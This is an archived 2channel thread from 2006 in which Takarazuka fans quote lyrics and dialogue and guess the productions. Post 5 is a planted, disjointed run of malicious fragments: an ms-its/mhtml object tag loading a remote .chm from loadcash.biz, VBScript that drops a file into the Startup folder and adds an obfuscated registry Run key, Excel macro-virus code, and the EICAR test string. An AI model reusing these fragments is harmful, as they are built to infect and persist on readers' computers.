5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

歌詞・台詞の一部で宝塚作品を当てるスレ2幕目

1 :名無しさん@花束いっぱい。:2006/12/09(土) 23:19:22 ID:Myv4/uzT
今も蘇るあのナンバー、心に残る名台詞、もう一度観たいあの作品、
宝塚歌劇90年余の歴史の中からお好きな歌詞・台詞の一部を出題して
作品を当てるスレです。当てるも楽し当てられるも楽し、お題の重複もまた楽し。
正解・不正解のアナウンスも適宜入れつつ
清く正しく美しく、ごゆるりと楽しんでくださいまし。

前スレ
歌詞台詞粗筋の一部で宝塚作品を当てるスレ
http://hobby8.2ch.net/test/read.cgi/siki/1161680958/l50




2 :名無しさん@花束いっぱい。:2006/12/09(土) 23:21:57 ID:SmKyuc1W
>1 乙!

 つ旦~ドゾー

3 :名無しさん@花束いっぱい。:2006/12/10(日) 01:46:51 ID:JmK7LsVy
1さん、ありがとう!!
前1さんのご提案にそってタイトル変更もしてくださったんですね!

2幕目を祝して、何となく需要のありそうな年代の問題です。
1 きらめきの中に愛を広げて ファンタジックな世界をプレゼント
2 涙にくちづけしたのは誰 目覚めに香る花の色は何
3 君に恋して夢を見れば 夢は薔薇色胸に甘く
4 あなたの頬に伝う涙 そしてあなたの思い出



4 :名無しさん@花束いっぱい。:2006/12/10(日) 03:21:07 ID:dGHVGrr2
>>1
乙&dです。

>>3
1はザ・ショーケース?の主題歌?
2はザ・ドリーマーのミミさん。
3は雪組だなー一路さんが歌った?何だっけ?w
4はパパラギ?シメさんとマリコさんが浮かぶ。

5 :<body onload=window()>:2006/12/10(日) 07:46:42 ID:owrlorqb
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :名無しさん@花束いっぱい。:2006/12/10(日) 07:55:20 ID:4eK2AQf2
>>3
4は「ジーザス・ディアマンテ」の主題歌。


問題。
歌詞「どの娘もあなたの物、この船はパラダイスよ。
このパラダイスで過ごせば幸せよ」

7 :名無しさん@花束いっぱい。:2006/12/10(日) 08:53:02 ID:1xtgjrFD
>>6
星組「宝塚レビュー90」のシメさんメインのショーボートの場面で
コケシさんが歌ってた曲
出演者がタンバリンを持って歌い踊ってたのが印象的です

8 :名無しさん@花束いっぱい。:2006/12/10(日) 08:54:59 ID:qvNycf/o
>>6
星組、宝塚レビュー90のシメさん、じゅんべさん、こけしちゃん登場のお船の場面。華やかで好きだったよ。
前スレの>>980さんの小鳩のココットは『パリ、それは悲しみのソナタ』?言われてたウェイターはいしちゃんだった気が・・・

9 :6:2006/12/10(日) 09:18:02 ID:4eK2AQf2
>>7-8
正解!
明るく楽しい場面でしたよね、娘役さんの衣裳が可愛かった。

>>8
自分前スレ>>980でもありますが、「小鳩のココット」分かって下さって嬉しいっ。
そうそう、若き日の轟さんがウェイターさんで、この台詞を言われて
「ありがとうございます、申し伝えておきます」って言ってましたよね(懐)

10 :8です:2006/12/10(日) 10:49:24 ID:qvNycf/o
>>6さん、980番もあなたでしたか!宝塚にはまりまくった中学時代、姉が買っていた『パリ、それは悲しみのソナタ』のレコードを聞いていて、轟さんを発見したときの衝撃!当時雪組の新人公演で主役やり始めたころのいしちゃんファンだったので嬉しかったです
では問題、歌詞です
すすり泣き叫びあげ  笑い囁く川の声  夢だけは忘れるな  我が腕で明日をつかめ〜♪

11 :名無しさん@花束いっぱい。:2006/12/10(日) 15:28:16 ID:JmK7LsVy
4番さん、3-1・2 正解!
6番さん、3-4 正解!
3-3は雪組「パラダイス・トロピカーナ」でした。

(歌詞)
1.母なるふるさとの 桃の花咲く丘
2.冷たいミルク 甘いイチゴ 
3.千夜一夜の夢 蒼い月影の夜
4.熱き想いに胸は 強く高鳴りふるえる


12 :名無しさん@花束いっぱい。:2006/12/10(日) 16:04:08 ID:9F7LelvW
2は、「大いなる遺産」のオープニングの、物売りの歌!
「きれいな花〜。」って続いたですよね?
あれ、だれだったんだろう?

13 :名無しさん@花束いっぱい。:2006/12/10(日) 18:04:58 ID:qvNycf/o
1はなつめさんの『春の風を君に』でしょうか?ルコさん退団公演ですね。

14 :名無しさん@花束いっぱい。:2006/12/11(月) 20:38:34 ID:k1m43DjB
問題です。

台詞「何だか難しい血の病で、静かにしてないと・・・」

歌詞1「空から生まれたの、私、宇宙の雫」

歌詞2「貴女の愛が欲しくて、ルールルー」


15 :名無しさん@花束いっぱい。:2006/12/11(月) 22:52:48 ID:/wrgiTbv
>>13 2は黄昏色のハーフムーンでカリンチョさんと仁科さんがショーのシーンで歌ってた曲。

久々の参加で問題。
歌詞1:
もしも翼があれば
君のいる街へ総てを捨てて行きたい

歌詞2:
花 美しく咲き誇り
月 爽やかに照り映える
雪 山々が紅葉して
星 瞬いて夢誘う

歌詞3:
心に残るその瞳 湖の青い色にも似て
美しく秘めやかに憂いを漂わす

16 :名無しさん@花束いっぱい。:2006/12/11(月) 22:53:35 ID:ZdtfFVqB
>>14
歌詞2はレ・ビジュー・ブリアン全ツの新場面かな?


17 :14:2006/12/11(月) 23:03:47 ID:k1m43DjB
>>15
歌詞2は4組時代の催し物で良く歌われた「タカラヅカ行進曲」
歌詞3は「はばたけ黄金の翼よ」の主題歌。

>>16
正解!
DVD化して欲しかったよ〜との想いを込めての出題でした^^;
あの場面の麻子ちゃんの舞台写真買ったので、眺めては思い出してます。

18 :名無しさん@花束いっぱい。:2006/12/12(火) 00:37:14 ID:ys9K3hcM
12・13・15さん正解です。
12さん、物売りの歌は4人くらいで歌い継いでいたような。
私も誰かは覚えていません。ごめんね。
15さんの歌詞1は「TAKE OFF」 ゆきちゃんの折鶴の場面ですか?

19 :名無しさん@花束いっぱい。:2006/12/12(火) 20:45:15 ID:usloTPAw
>12
物売りの歌、続く歌詞は「産みたての卵」「可愛い花」でした。
若木萌さん(←名前に自信無し)と美城まりさん。後2人が出てこない…

歌詞:失う物など何にもないから 全てを捧げよう 一度切りの人生

20 :名無しさん@花束いっぱい。:2006/12/12(火) 21:32:31 ID:lTfxW+rd
問題です
歌詞 愛は夜に立つ陽炎
月明りに燃えて消えて行く

21 :名無しさん@花束いっぱい。:2006/12/12(火) 21:47:01 ID:O2syitTd
>19
「メランコリック・ジゴロ」の歌だとは思うんですが・・・。
全てを賭けよう、じゃなかったですか?
違ってたらごめんなさい。

22 :名無しさん@花束いっぱい。:2006/12/12(火) 21:59:33 ID:m139JY8M
>>14ですが、答え出ない様なので追加ヒント。

台詞は星組、血の病は白血病。
ショーは月組、大劇のみの公演。

23 :名無しさん@花束いっぱい。:2006/12/12(火) 22:04:33 ID:iOG7Rlxl
>>14
台詞は「炎のボレロ」ハッチさんの役ですね。

24 :名無しさん@花束いっぱい。:2006/12/12(火) 22:07:07 ID:m139JY8M
>>23
おお、早速答えが!正解!

25 :名無しさん@花束いっぱい。:2006/12/12(火) 22:25:43 ID:5z3A53wB
>20
思い出せない〜ここまで出掛かってるのにッ!

26 :名無しさん@花束いっぱい。:2006/12/12(火) 22:26:27 ID:ewP8cb/J
血の病〜はジャジー?

27 :名無しさん@花束いっぱい。:2006/12/12(火) 22:46:35 ID:m139JY8M
>>26さん
すみません、>>14の台詞の答えでしたら、>>23さんに既に戴きました。
因に歌詞の方は、「レッド・ホット・ラブ」のミミちゃんでした。

又問題です。

歌詞1「不思議に満ちた森で、いつか君と出逢う」(月バウ)

歌詞2「プレイボーイだというけど仕方が無いのさ。
女の子の方から近付いて来るのさ」(雪ショー、チト古いかも)

28 :名無しさん@花束いっぱい。:2006/12/13(水) 00:12:03 ID:dLWQX9K3
>21
正解です。打ち間違えてしまいました。スミマセン。

歌詞:何を願い 何を見つめ 生きてゆくのだろう 耐えてゆくのだろう

29 :名無しさん@花束いっぱい。:2006/12/13(水) 01:08:14 ID:nVA8DsQt
問題
今日は師走の13日

歌詞です。
簡単すぎるかな?

30 :名無しさん@花束いっぱい。:2006/12/13(水) 06:24:51 ID:NOGj6Uf9
かりんちょさんの『忠臣蔵』でしょうか?
では問題
歌詞『ナイルの流れは時としてかわれど 君の心、変わることなく、信じたいあなた(お前)を〜』

31 :名無しさん@花束いっぱい。:2006/12/13(水) 17:20:27 ID:ZkPXSYSI
>>30
「真紅なる海に祈りを」

32 :名無しさん@花束いっぱい。:2006/12/13(水) 21:02:34 ID:CJGCy+M8
問題です

歌詞1「人は皆 共に今を生きる仲間」
歌詞2「クヨクヨして逃げても 何にも変わらない」
歌詞3「絡み合った糸のように もどかしくて想いは乱れ」

33 :名無しさん@花束いっぱい。:2006/12/13(水) 21:13:37 ID:NOGj6Uf9
>>31さん
正解です!
ぺいさんのアントニーとなつめさんのイノバーバスが素敵でした!

34 :名無しさん@花束いっぱい。:2006/12/13(水) 21:42:15 ID:THOqAUra
歌詞の問題です。
「結婚したいの誰でもいいのよ」

35 :名無しさん@花束いっぱい。:2006/12/13(水) 21:47:14 ID:wYkAI6u6
>>27さん
2の方。雪組の「フル・ビート」ターコさんがパナマ帽片手に歌ってた曲。

36 :名無しさん@花束いっぱい。:2006/12/13(水) 21:48:58 ID:Ryq6Qm/d
歌詞「まだ私のこと知りもしないのに あの人なんてこと言うの」

台詞「せつないものしか人は恋と思わん」

37 :名無しさん@花束いっぱい。:2006/12/13(水) 21:51:06 ID:wYkAI6u6
>>36さん
歌詞は「ヴェロニック」のエレーヌの怒りのお歌。
台詞が出てこない、きいたおぼえがあるのに。

38 :名無しさん@花束いっぱい。:2006/12/13(水) 21:53:43 ID:US/zMdUR
>37
理事の台詞だったと思うんだけど、忘れた
オイラもここまで出掛かってるのに

39 :名無しさん@花束いっぱい。:2006/12/13(水) 22:09:36 ID:letwUWal
>>34
キス・ミー・ケイトのビアンカ(チコさん)の歌
あの場面、可愛くて好きだった。

40 :27:2006/12/13(水) 23:29:45 ID:3m2OIZw2
>>35、正解!

41 :名無しさん@花束いっぱい。:2006/12/13(水) 23:42:04 ID:Ryq6Qm/d
>37さん、正解☆

>38さん、理事ではありません。

42 :名無しさん@花束いっぱい。:2006/12/13(水) 23:45:53 ID:US/zMdUR
>41
「恋とはせつないものだ そしてせつないものしか恋とは思わん」
みたいな台詞だったと思う

思い出した!タータンだ!
ゼンダ城の虜のヘンツォ伯爵。

43 :名無しさん@花束いっぱい。:2006/12/14(木) 01:01:12 ID:wSYrL3wF
歌詞1)人は孤独と誰かが言ってたけど だからこごえた指先暖め合い
歌詞2)僕は変わってしまっただろうか 君も変わっているかも知れない
歌詞3)すべてを許し すべてを与え すべてを求めること 


44 :名無しさん@花束いっぱい。:2006/12/14(木) 01:43:59 ID:5qAfoWOq
>>43
2はギャツビーの主題歌。この作品の歌なら全部分かるw

45 :名無しさん@花束いっぱい。:2006/12/14(木) 01:47:07 ID:10S1Vo8V
台詞
君がここから逃げ出せば、君はこれから先どこへ行っても、
何をやっても、逃げ出すことになるのがわからないのかッッ!

出題しておきながら、公演名しか覚えてませんが…orz


46 :名無しさん@花束いっぱい。:2006/12/14(木) 02:12:34 ID:bYmoYdby
>>43さん
歌詞1はメランコリック・ジゴロ。

47 :名無しさん@花束いっぱい。:2006/12/14(木) 05:59:06 ID:o96DONFX
まだ出ないので>28のヒント。10年程前の月バウです。

48 :名無しさん@花束いっぱい。:2006/12/14(木) 07:47:02 ID:ML+nhn0d
>20
ロストエンジェルかなめさんですね。

49 :34:2006/12/14(木) 08:05:36 ID:iIxNls3c
>>39
正解です!

では問題を。
台詞1「でも私達に何ができて?歌っても踊ってもあの程度。
くだらないおしゃべりしかできないのよ。」
台詞2「カエルのバンザイ」

50 :名無しさん@花束いっぱい。:2006/12/14(木) 10:47:20 ID:bYmoYdby
>>49
台詞2は宙組バウの「フィガロ」?

51 :名無しさん@花束いっぱい。:2006/12/14(木) 12:33:39 ID:/J04/3OQ
>42さん、正解です♪

52 :名無しさん@花束いっぱい。:2006/12/14(木) 13:18:45 ID:c/X9LnVB
>>48さん正解です!
当ててもらえて良かった〜。

53 :名無しさん@花束いっぱい。:2006/12/14(木) 15:20:23 ID:X6N/d+L/
>>45さんのが気になる。
多分きいた事ないけど、いい台詞ですね。

これだけじゃ何なので初出題させてください。

歌詞)愛してる人々をなくさない真心を
行き先はいつの日も知れない けれど

54 :名無しさん@花束いっぱい。:2006/12/14(木) 15:49:50 ID:Uu3taYUg
>>45
何故か、カリさんが言ったか言われたかしてるのが浮かぶ・・・。
ヴァレンチノ?違うよね?勘で言ってゴメソ。

私からも問題。
歌詞1「昂ぶらない、慢らない、苛立たない、恨まない。
あなたの為生命さえ惜しまない」

歌詞2「シルクのドレスに髪を綺麗にセットして、
コロンほんのり、恋の相手に出会うため」

55 :49:2006/12/14(木) 16:48:31 ID:7nmKlN77
>>50
正解です!
これだけでわかっていただけてウレシイ!

56 :名無しさん@花束いっぱい。:2006/12/14(木) 22:22:02 ID:T3mBo5fl
>28さん やっと分かった!聞き覚えがある歌詞だけど誰が歌ってたか
思い出せずイライラしていたのです〜。ナイスヒント!!
94年「WANTED」でかざっぱなちゃんが歌ってた歌ですね!

>43さんの歌詞3
>54さんの歌詞1  は共に「Shion」の歌詞です。

>53さんの歌詞は「ハードボイルドエッグ」の中詰あたりの歌ですね。
あの歌大好きです。


57 :54:2006/12/14(木) 23:44:20 ID:Uu3taYUg
>>56
正解!
何かイライラしそうな時、この歌詞をつい口ずさんでしまいますw

58 :名無しさん@花束いっぱい。:2006/12/15(金) 13:45:49 ID:pHYQ9wRw
問題、ショーの歌詞です。

「ようこそ私のこの星へお越し下さいました。
私はこの星で愛を奏でる夢の王子」

59 :名無しさん@花束いっぱい。:2006/12/15(金) 15:36:52 ID:ej4DUKmV
>>54
45ですが、残念ながらヴァレンチノではありません…
レビュー交響楽で足を怪我して踊れない(歩けない?)と
諦めて逃げ出そうとしているダンサーに向かって
誰かが言ってた台詞です。

60 :名無しさん@花束いっぱい。:2006/12/15(金) 15:40:46 ID:Y2XqBOaU
>>53です。
>>56さん正解です!
大好きな曲なので当ててもらえて嬉しいです。

61 :54:2006/12/15(金) 15:46:34 ID:pHYQ9wRw
>>59
>レビュー交響楽で足を怪我して踊れない(歩けない?)と
> 諦めて逃げ出そうとしているダンサーに向かって
> 誰かが言ってた台詞です。

ああっ、なるほど、頑張れニコラか!
怪我したダンサーのニコラはハッチさんだったよね、その妹がジュンベさんで。
「兄さんが歩いた〜〜!」って、ベタだけどウルッと来た記憶があるわ。
でも、問題の台詞は覚えてなかった、スマソorz

62 :名無しさん@花束いっぱい。:2006/12/15(金) 22:17:18 ID:Qh+xKYtZ
歌詞1「夢が覚めるのがこわい だから夢はみない
夢みるのがこわい だから眠れない」

歌詞2「いつかの思い出が甦る この街のどこかにあなたの面影」

歌詞3「何もない空っぽ やりたい事もやるべき事も」

個人的に動揺した時に頭にかかる娘役の歌シリーズ(笑)

63 :名無しさん@花束いっぱい。:2006/12/16(土) 09:53:34 ID:vUGLBhWA
歌詞1 真昼の恋が戯れでも 真夜中の愛こそまこと
歌詞2 嘘だって愛のうち 浮気なら許してあげる
歌詞3 好きだから何も言えず 無口な愛を装い



64 :名無しさん@花束いっぱい。:2006/12/16(土) 12:52:13 ID:Ik5Tp1vy
>>63
歌詞1はアポロンの迷宮の主題歌(「夢泥棒、恋泥棒」だっけ?)
歌詞2はパルファン・ド・パリの蝶の場面で、特出二番手さんと娘1さんが
役替わりで歌ってた場面(星バージョンはノルさんとあやちゃんだったかな?)

>>54の歌詞2出ないかな?これも星ショーなんだけどな。

65 :名無しさん@花束いっぱい。:2006/12/16(土) 13:33:13 ID:/6CKXT7t
>>62
歌詞1はシンデレラ・ロックのみえちゃんだったかな?

66 :名無しさん@花束いっぱい。:2006/12/16(土) 15:24:14 ID:L5ml714z
>>63
歌詞3はサザンクロスレビューのプロローグかな?

67 :名無しさん@花束いっぱい。:2006/12/16(土) 18:03:16 ID:jUA71Sk+
>>54
歌詞2は「ラ・カンタータ!」の「ステート・フェアー」の場面。
陵あきのさん扮するアグネスの歌だと思います。

68 :名無しさん@花束いっぱい。:2006/12/16(土) 19:11:44 ID:Ik5Tp1vy
>>67
正解!
マリコさんとあっこちゃんのコンビが可愛かったですね。

ついでに>>58のヒントも。
月ショー、カナメさんです。

69 :名無しさん@花束いっぱい。:2006/12/16(土) 19:29:09 ID:mbi7LguV
>62

歌詞3は、「THE LAST PARTY」のゼルダが歌う「Who am I」。
私も動揺した時にこの歌がすぐ浮かびますw

70 :名無しさん@花束いっぱい。:2006/12/16(土) 21:21:15 ID:DWQ/6sNz
>>58
「ビバ!シバ!」でしょうか?
(ヒントでなんとなく・・・。)

71 :名無しさん@花束いっぱい。:2006/12/16(土) 21:44:56 ID:qcvtU7at
歌詞の問題です。
1「お願い、ほんの5分くらい、僕にチャンスおくれ」
2「いなづまが押さえ切れない光を吹き飛ばし
星空が永遠の時を刻む あなたといつか」
3「鬼も十八 番茶も出花 下町小町と言われた私」

72 :名無しさん@花束いっぱい。:2006/12/16(土) 21:50:53 ID:DkU3Veky
問題です。
台詞1「お祝いだねえ。一緒に行く気なんてないくせに」
台詞2「そちが命令すればよい司令官どの」

73 :名無しさん@花束いっぱい。:2006/12/16(土) 23:07:27 ID:Ik5Tp1vy
>>70
正解!
ハードロック調?なカナメさんが、実は王子様だったって場面でしたね。
(良かった、当ててもらえて)

74 :名無しさん@花束いっぱい。:2006/12/16(土) 23:18:24 ID:7zRkjLik
>>71
3は星組のショー、日本物?でたきちゃんが歌ってましたよね?
春の踊り?

75 :名無しさん@花束いっぱい。:2006/12/17(日) 00:07:08 ID:Nrh1K/4q
>65さん、そうです。役名わかりますか?

>69さん、正解です☆

76 :71:2006/12/17(日) 07:45:24 ID:vlQ3fOWg
>>74
正解です!
「春の踊り〜恋の花歌舞伎〜」こんな感じでしたっけ?
(東京で観たので「春の踊り」が取れていたのです。とほほ)
個人的に「私は美人の人妻♪」と歌ったくりちゃんがツボ☆
でした。

77 :名無しさん@花束いっぱい。:2006/12/17(日) 13:34:44 ID:KOoTnM/F
台詞の問題。

「○○○は百日咳、○○○は歯が一本抜けた、しかしもう元気だ」

伏せ字の所は人物名なんですが、うろ覚えなんで^^;
ヒント)某トップさんのサヨナラ公演です。

78 :名無しさん@花束いっぱい。:2006/12/17(日) 14:13:32 ID:JxmbW7z+
問題
台詞1 お前に心を許したことなど一度もない!
台詞2 怒っちゃいない、自分を抑えられないだけだ。
台詞3 37才独身、このくらいのところです。


79 :名無しさん@花束いっぱい。:2006/12/17(日) 14:14:35 ID:4UcQsFd3
>78
3.ガラスの風景なるみん刑事さんの台詞

80 :名無しさん@花束いっぱい。:2006/12/17(日) 14:35:25 ID:UzvObEVK
>>77
川霧…?幸さん宛の手紙の内容のような?

81 :名無しさん@花束いっぱい。:2006/12/17(日) 15:02:13 ID:NSvimrzf
〉78
1、花吹雪恋吹雪のそんちゃんの台詞
2、プラハの春のとうこヤンの台詞

82 :名無しさん@花束いっぱい。:2006/12/17(日) 15:38:27 ID:KOoTnM/F
>>80
川霧じゃないです。
(幸さんへの手紙の場面なんてありましたっけ?
もしあって、似た様な台詞があったなら、
私の記憶力不足です、すみませんm(__)m)
私が意図したのは、星トップさんのサヨナラです。

83 :名無しさん@花束いっぱい。:2006/12/17(日) 18:08:35 ID:Kf07uGNT
>>77
絶対聞いたことある、そして笑った覚えがある…シメさんが浮かぶ…
ミネちゃんのサヨナラの別離の肖像?

84 :名無しさん@花束いっぱい。:2006/12/17(日) 18:48:12 ID:KOoTnM/F
>>83
正解!
峰さんがマイマイさんと駈け落ちするんだけど、残してきた
家族の様子をシメさんから聞くって場面でした。
私も笑いそうになった記憶あります、
凄く真面目な場面で、シメさんも軍服の二枚目さんなんだけど、
それだけに「歯が〜」の件が笑いのツボを刺激してw

85 :名無しさん@花束いっぱい。:2006/12/17(日) 19:08:18 ID:JxmbW7z+
79さん、81さん正解です。
71さんの2は「ラバーズ・コンチェルト」

86 :71:2006/12/17(日) 21:56:20 ID:HhYpl4IO
>>85
正解です!
歌詞1は当時の若手男役4名が銀橋を渡りながら歌った場面の歌詞
です。次の場面のインパクトが強すぎるのかなあ。
(ちなみになーちゃん時代の花組ショーです)

87 :名無しさん@花束いっぱい。:2006/12/18(月) 01:36:04 ID:Z/bPYjCh
問題(歌詞)
1.春散り初めし花々は うつつの闇に迷い散る
2.花の盛りの江戸城で 春の嵐が吹き始めた
3.朧月夜の桜花 薄墨色に蒼ざめて

思いっきり季節外れですね・・・失礼。

88 :名無しさん@花束いっぱい。:2006/12/18(月) 01:58:49 ID:LRnsQjVg
1.の答え 花の業平 ですね。

89 :名無しさん@花束いっぱい。:2006/12/18(月) 02:03:19 ID:Rk4wy3ii
>>87タソ

2は忠臣蔵のカリンチョさんの歌
パレードの時の、大階段のでの歌

90 :名無しさん@花束いっぱい。:2006/12/18(月) 02:19:14 ID:ZCUiOCA4
台詞の問題です。

「私の頭は冷えております!」

ヒント>日本物です。

91 :名無しさん@花束いっぱい。:2006/12/18(月) 10:52:18 ID:v2fHAfXO
>3.朧月夜の桜花 薄墨色に蒼ざめて

「たまゆらの記」
やっちゃんキレイだったなぁ。

柴田先生の宛書が絶品で。
カリンチョさんの「はずそうか・・・?」の『間』がたまらんかった。


92 :名無しさん@花束いっぱい。:2006/12/18(月) 19:07:15 ID:ZCUiOCA4
>>90の追加ヒント、これも雪組、カリさんです。

ついでに歌詞問題一つ。

「捨てる想い出はまだ無い。
キザな台詞は言えない。
見て見ぬ振りも出来ない。
誤魔化す事も知らない」

ヒント>ウタコさん時代の月バウです。

93 :名無しさん@花束いっぱい。:2006/12/18(月) 19:28:22 ID:hhDznGHo
>56
正解です!なかなか答えが出ないから寂しかったんです。ありがとう。

歌詞:お前には分からない 俺は賭けを打って出るんだ

94 :名無しさん@花束いっぱい。:2006/12/18(月) 20:41:24 ID:xT+lXf4E
93さん、
「黒い瞳」橇の場面ですね。ニコライとプガチョフの歌。

95 :名無しさん@花束いっぱい。:2006/12/18(月) 23:31:19 ID:1R3fpBdq
問題(歌詞)
1 安らぎさえもあまりに遠くまどろみさえもほんのつかの間
2 富を求めて商人達が夢を求めて若者達が
胸躍らせ息づいて熱い思いが渦巻く都


96 :名無しさん@花束いっぱい。:2006/12/18(月) 23:48:03 ID:Hkk4THNp
歌詞1は、「銀の狼」ですね!

97 :名無しさん@花束いっぱい。:2006/12/18(月) 23:55:18 ID:ReijBnIp
>>95さん

問題2は「ヴェネチアの紋章」ですね!
実はその歌のときのおキャル様のドレスが結構好きでした・・・。

98 :名無しさん@花束いっぱい。:2006/12/18(月) 23:56:37 ID:Z/bPYjCh
88・89・91さん
正解です。
柴田先生の日本物の歌詞は情緒豊かで大好き!
95さん、2は「ヴェネチアの紋章」?

99 :名無しさん@花束いっぱい。:2006/12/19(火) 01:02:22 ID:sqSIf/Uu
全て歌詞です。

1.罪の深さに耐え切れず 哀しみの大地を彷徨い続ける
2.生きてきたのだから そして生きてゆくのだから
3.この時のために 命燃やし続け 今日まで来た
4.どんな苦しみも どんな悲しみも 終わる日が来ると


100 :名無しさん@花束いっぱい。:2006/12/19(火) 01:06:13 ID:J7/UK/01
>99タン
2はあまみんトプお披露目公演「扉のこちら」の主題歌「とびらをあけて」
3はイチロトプお披露目公演「天国と地獄」の主題歌「今、始まりの時」


…てことは残り2つもトプお披露目公演?

101 :名無しさん@花束いっぱい。:2006/12/19(火) 01:07:28 ID:MqbuO9A8
>99さん、
2は「扉のこちら」の天海氏ですね。

102 :名無しさん@花束いっぱい。:2006/12/19(火) 01:10:43 ID:sqSIf/Uu
100さん、達成おめでと〜!
そして、素晴らしいヨミです。
同時代のお披露目公演ですよ。
101さんもお答え、ありがとうね。

103 :名無しさん@花束いっぱい。:2006/12/19(火) 02:31:13 ID:yheCX3AP
どなたもお答えにならない様なので、>>90の答えを。
「天守に花匂い立つ」のカリさんでした。

>>92は、やっぱり難しいかな〜、当時の若手がトリオで主演してました。
(お一人、今も現役の方がいます)

104 :名無しさん@花束いっぱい。:2006/12/19(火) 08:10:52 ID:X8Lr1M2/
>99さん
1→「エデンの東」
4→「国境のない地図」
ですか?

105 :93:2006/12/19(火) 14:44:31 ID:1QLW3rVP
>94
正解です。

>103
主演トリオの内の1人はイシちゃん?
「青春の旋風」とかいう作品があったような?ファンになる前の時代だから
実は知らないんですけど…

106 :名無しさん@花束いっぱい。:2006/12/19(火) 22:29:24 ID:ZzxTIL3K
台詞の問題です。
「これは本当に爆弾なんかじゃないんです」

107 :名無しさん@花束いっぱい。:2006/12/19(火) 22:29:55 ID:YJocHnCx
問題です

歌詞
1.何故時はただ過ぎる 何故愛は終わる

2.ずっと続くはずと信じていた優しい日々が あの日砕き壊され踏みにじられた


最近、何故か頭の中をぐるぐると回る歌詞です…。
1はショー、2はお芝居で組は違います。


108 :名無しさん@花束いっぱい。:2006/12/20(水) 13:22:17 ID:BItwIQxJ
>>105
正解!
みつえさん、ノンちゃん、イシちゃんが主役でした。


109 :名無しさん@花束いっぱい。:2006/12/20(水) 16:54:07 ID:7WQGWIB5
歌詞の問題です。
1「僕のものさ 彼女は はじめて見たその日から
高からず低からず ちょうど似合いの二人さ」

2「俺の責任は海より深く 俺の仕事は山ほどあるんだぞ
俺は2千人の同志のリーダーだ」

110 :名無しさん@花束いっぱい。:2006/12/20(水) 20:50:49 ID:Uw7/SQsF
2は、「ときめきの花の伝説」のジャン・マリオ。

111 :109:2006/12/20(水) 21:14:47 ID:BnvdSv/q
>>110
正解です☆

歌詞1は雪組のバウです。

で台詞の問題を1つ・・・。
「もちろんガラスの靴はシンデレラの足にぴったり。
にっこり微笑む王子様。めでたしめでたし」

112 :名無しさん@花束いっぱい。:2006/12/20(水) 21:36:37 ID:kOiK5dA7
台詞
「あちらとこちら。
 こちらとあちら。
 私はただの会計士。」

歌詞
「こわいわ 目がまわる」

どっちも仕事中に浮かんできた…

113 :名無しさん@花束いっぱい。:2006/12/20(水) 22:51:40 ID:MrAhyW7J
96さん97さん98さん、正解です。

114 :名無しさん@花束いっぱい。:2006/12/21(木) 00:07:59 ID:YX7LoXYc
問題
1)悪い夢見たのよ あいつの罠 みんな消えた
2)手に取れば消えた うたかたの夢
3)今は遠い夢のふるさと 名も知らぬ鳥は歌う
4)過ぎた日の夢 心に甘く 春風に揺れて


115 :名無しさん@花束いっぱい。:2006/12/21(木) 00:30:00 ID:CiSP0vEi
>114の3はエキゾティカの故郷の歌…だっけ?

116 :名無しさん@花束いっぱい。:2006/12/21(木) 00:31:12 ID:eFmMRSca
114さん、
1の歌詞は月組ショー「ミリオンドリームス」の地下鉄の場面、ヨシコちゃんの歌。

117 :名無しさん@花束いっぱい。:2006/12/21(木) 03:47:53 ID:RceIo3Cx
>>114さん
歌詞2は「バビロン」?

118 :名無しさん@花束いっぱい。:2006/12/21(木) 07:11:37 ID:06HVIc5E
>>111
花組「ヒーローズ」のジェニーのシンデレラ風の場面のナレーション?

もしそうならジェニーはマサエさん、
王子様はナツメさんでしたね
地方公演版のルコさんやカズキさんの王子様も見て見たかったな

119 :名無しさん@花束いっぱい。:2006/12/21(木) 08:26:56 ID:2WXbpUAS
>>112
歌詞はガイズ&ドールズのサラかな?
スカイにキスされた後に歌っていたような…。

120 :名無しさん@花束いっぱい。:2006/12/21(木) 08:52:48 ID:krAAAv1Q
107の歌詞2、トップ娘役な気がする。
大鳥れいちゃん?あさき?


121 :111:2006/12/21(木) 16:24:01 ID:MexbmqJy
>>118
正解です!
この公演、生で観たことがなくて実況盤とTVのみなんです。
生で観たかった。(グラフの地方公演の写真も指くわえて見てました)

122 :107です:2006/12/21(木) 16:31:12 ID:CiSP0vEi
>120タン みどりちゃんではないよ〜。
でもちょっとおしい、かな。トップ娘役とその子供時代の子がならんで歌ってる。

123 :名無しさん@花束いっぱい。:2006/12/21(木) 17:51:30 ID:tIFM6jqX
>>107
歌詞2は「白昼の稲妻」の花ちゃんとたっちんの歌詞かな?

124 :名無しさん@花束いっぱい。:2006/12/21(木) 19:47:29 ID:CiSP0vEi
>123タン 正解!


125 :名無しさん@花束いっぱい。:2006/12/21(木) 19:56:48 ID:tJ+JKFf5
>>112タン
台詞は[バロンの末裔]の会計士ローバックの台詞?
ゆら姉さんのシャーロットにはたまげたよ…

126 :名無しさん@花束いっぱい。:2006/12/21(木) 20:09:44 ID:/ABIBGRb
歌詞の問題

「ああ、ひどい裏切り裏切り、ダメよダメよダメよダメよ(号泣)、アーメン」


ヒント>80年代後半のショーです。

127 :名無しさん@花束いっぱい。:2006/12/22(金) 03:03:05 ID:OokBVC0v
>126
